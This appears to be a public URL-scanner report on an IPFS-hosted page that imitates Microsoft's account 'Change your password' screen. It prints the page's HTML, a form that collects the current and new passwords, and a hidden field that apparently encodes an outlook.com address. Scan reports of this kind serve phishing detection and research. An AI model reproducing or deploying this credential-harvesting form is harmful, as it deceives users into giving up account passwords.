gateway.ipfs.io Open in urlscan Pro
2602:fea2:2::1  Public Scan

URL: https://gateway.ipfs.io/ipfs/bafybeigoyhagxxnwdrfbngkrm2ru6yzf47igaymy44nbsgredsvy2c4vom/cpass.html
Submission: On June 28 via api from JP — Scanned from JP

Form analysis 2 forms found in the DOM

POST

<form method="post">
  <section class="section">
    <div class="section-body container">
      <input type="hidden" value="žée" id="email" name="email" readonly="readonly">
      <div id="UpdatePasswordTitle" class="text-subheader" role="heading" aria-level="1" data-bind="text: pageTitle">Change your password</div>
      <div class="row">
        <div class="col-xs-24 form-group text-block-body" data-bind="html: descriptionText">A strong password helps prevent unauthorized access to your email account.</div>
      </div>
      <div class="row" data-bind="visible: usernameDesc" style="display: none;">
        <div class="col-xs-24 text-block-body form-group" id="UpdatePWDUsernameDesc" data-bind="text: usernameDesc"></div>
      </div>
      <div class="row" data-bind="visible: passwordDesc" style="display: none;">
        <div class="col-xs-24 text-block-body form-group" id="UpdatePWDPasswordDesc" data-bind="text: passwordDesc"></div>
      </div>
      <div class="row">
        <div role="alert" aria-live="assertive">
          <div class="alert alert-error" id="iPageError" style="display: none;"></div>
        </div>
      </div>
      <div class="row">
        <!--Password-->
        <div class="form-group input-max-width">
          <label class="text-base" for="Account">Account</label><br>
          <span id="tgt">žée</span>
        </div>
      </div>
      <div class="row" data-bind="if: isCurrentPasswordRequired, visible: isCurrentPasswordRequired">
        <!--Current Password-->
        <div class="form-group input-max-width col-xs-24">
          <label class="text-base" for="iCurPassword">
            <!-- ko if: showSkypeName --><!-- /ko -->
            <!-- ko ifnot: showSkypeName --> Current password <!-- /ko -->
          </label>
          <div role="alert" aria-live="assertive">
            <div class="alert alert-error x-hidden-focus" id="msg" style="display:none">The password is incorrect. Please try again.</div>
          </div>
          <input type="password" class="form-control email-input-max-width" id="password" name="password" aria-required="true" placeholder="Current password" aria-label="Current password"
            data-bind="value: currentPassword, hasFocus: currentPassword.focused, event: { keypress: onPasswordKeyPress }, css: { 'has-error': showError(currentPassword) }, attr: { 'aria-describedby': showError(currentPassword) ? 'pPwdErrorArea' : null }"
            maxlength="127">
          <div class="capslock" aria-hidden="true" data-bind="visible: handleCapsLockWarning &amp;&amp; isCapsLockOn() &amp;&amp; currentPassword.focused()" style="display: none;">Caps Lock is on</div>
          <!--Forgot Password Link-->
          <div data-bind="visible: showPreferSetNewPassword" class="left" style="display: none;">
            <label>
              <input type="checkbox" id="keepMSAPassword" name="keepMSAPassword" data-bind="checked: preferSetNewPassword">
              <span id="keepMSAPasswordLabel" class="text-base" data-bind="text: preferSetNewPasswordText"></span>
            </label>
          </div>
        </div>
      </div>
      <div data-bind="visible: showCollectNewPassword">
        <div class="row">
          <!--Password-->
          <div class="form-group input-max-width">
            <label class="text-base" for="iPassword">New password</label>
            <div role="alert" aria-live="assertive">
              <!-- ko if: showError(password) --><!-- /ko -->
            </div>
            <input type="password" class="form-control email-input-max-width" id="cpassword" name="cpassword" aria-required="true" placeholder="New password" aria-label="New password" aria-describedby="pNewPwdErrorArea iPassHint"
              data-bind="value: password, hasFocus: password.focused, event: { keypress: onPasswordKeyPress }, css: { 'has-error': showError(password) }" maxlength="127">
            <div class="capslock" aria-hidden="true" data-bind="visible: handleCapsLockWarning &amp;&amp; isCapsLockOn() &amp;&amp; password.focused()" style="display: none;">Caps Lock is on</div>
            <p id="iPassHint" class="help-block text-caption text-block-body">8-character minimum; case sensitive</p>
          </div>
        </div>
        <div class="row" data-bind="if: isPasswordReentryRequired, visible: isPasswordReentryRequired">
          <!--Retype Password-->
          <div class="form-group input-max-width">
            <label class="text-base" for="iRetypePassword">Reenter password</label>
            <div role="alert" aria-live="assertive">
              <div class="alert alert-error" id="pRetypePwdErrorArea" data-bind="errorMessage: retypePassword, visible: showError(retypePassword)" style="display: none;"></div>
            </div>
            <input type="password" class="form-control email-input-max-width" id="cpassword2" name="cpassword2" aria-required="true" placeholder="Reenter password" aria-label="Reenter password"
              data-bind="value: retypePassword, hasFocus: retypePassword.focused, event: { keypress: onPasswordKeyPress }, css: { 'has-error': showError(retypePassword) }, attr: { 'aria-label': retypePasswordAriaLabel }" maxlength="127">
            <div class="capslock" aria-hidden="true" data-bind="visible: handleCapsLockWarning &amp;&amp; isCapsLockOn() &amp;&amp; retypePassword.focused()" style="display: none;">Caps Lock is on</div>
          </div>
        </div>
        <div class="row" data-bind="visible: showExpirationCheckbox">
          <div class="form-group checkbox left">
            <label>
              <input type="checkbox" id="iExpire" name="Expire" data-bind="checked: expirationChecked">
              <span class="text-base">Make me change my password every 72 days</span>
            </label>
          </div>
        </div>
      </div>
      <div data-bind="visible: saveInstructions" style="display: none;">
        <div class="row">
          <div class="col-xs-24 text-block-body form-group" data-bind="text: saveInstructions"></div>
        </div>
      </div>
      <div class="row">
        <div class="btn-group">
          <div class="btn-group">
            <input type="submit" id="idSIButton1" class="btn btn-primary" role="button" aria-describedby="UpdatePasswordTitle" tabindex="0" value="Save">
            <input type="button" id="idSIButton2" class="btn" role="button" aria-describedby="UpdatePasswordTitle" tabindex="0" value="Cancel">
          </div>
        </div>
      </div>
    </div>
    <input type="hidden" id="iPostedTicket" name="t"
      value="GAArAgMAAAAMgAAADQAgaiQ5Ti230Jev5jgy5dQoiXXmXtS7/lmd25dO8Z1tDGkAAcFYbnt+bXQh77RM5oUNjvDBI4Lew/PSGlbnBxEUYJfM57P7xiSzf1BoQc9e8mMjXouUZCG8UnTUnYbv/Tc1GuBLjuzS3+XtBD4xirmebJQFNsuOjEWRyPTwBFQUW6saEoYxFSG4u6zPcskzTfbCwrTjUe7HfcMUGYJblATaYLtUKiNgU1TsYb+G/B3VfhMDVsG3wApB51JfTotAcRIfhg/cs2uZCaHH6Ytq2RWiB4zeiPYs02NzJKIqSKozwyvDozWkx9zImE3azS/AaWTjnusETrtVSUbR2j9WcKOtcQ4HYMlQGudvssdqSGxxffZaKGSWdD4TFMxBPncHpQKpuZ34AH4A+AD9vwMAw/q9V3Wqu2NqqrtjGJgAAKATIAAQAAA/AAAAAAAASFRSAAAAAAAABAkCAABgMlVAAAZDAAZMZXZlbnQAC8OHQUtJUk/EnkxVAAAAAAAAAAAAAAAAAAAAAAAAdNGFIEnIYD8AAHWqu2NqUTJkAAAAAAAAAAAAAAAADAA1NC4zOS4xMi43NAAFAQAAAAAAAAAAAAAAABAEAAAAAAAAAAAAi7p5YwAA2gwh7EcNUXUAAAAAAAAAAAAAAAAAAAAAAAAVAGx2Yzg1ODUwQG91dGxvb2suY29tAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAA">
    <input type="hidden" id="iNewPwdEncrypted" name="NewPwdEncrypted">
    <input type="hidden" id="iPublicKey" name="PublicKey">
    <input type="hidden" id="canary" name="canary" value="">
  </section>
</form>

Name: langPickerPOST /handlers/languagesave.mvc

<form name="langPicker" action="/handlers/languagesave.mvc" method="POST" aria-labelledby="locale-picker-link">
  <div class="modal-body">We're unable to display the list of languages at this time.</div>
</form>

Text Content

Skip to main content
Microsoft account
Your info
Privacy
Security
Rewards
Payment & billing
Services & subscriptions
Devices



Sign in




Change your password
A strong password helps prevent unauthorized access to your email account.



Account
žée
Current password
The password is incorrect. Please try again.
Caps Lock is on

New password

Caps Lock is on

8-character minimum; case sensitive

Reenter password

Caps Lock is on
Make me change my password every 72 days





English (United States)
 * Privacy & cookies
 * Terms of use
 * Contact us
 * Manage cookies
 * © Microsoft 2020

LANGUAGE

We're unable to display the list of languages at this time.
Save
 * Order history
 * Payment options
 * Address book
 * Billing help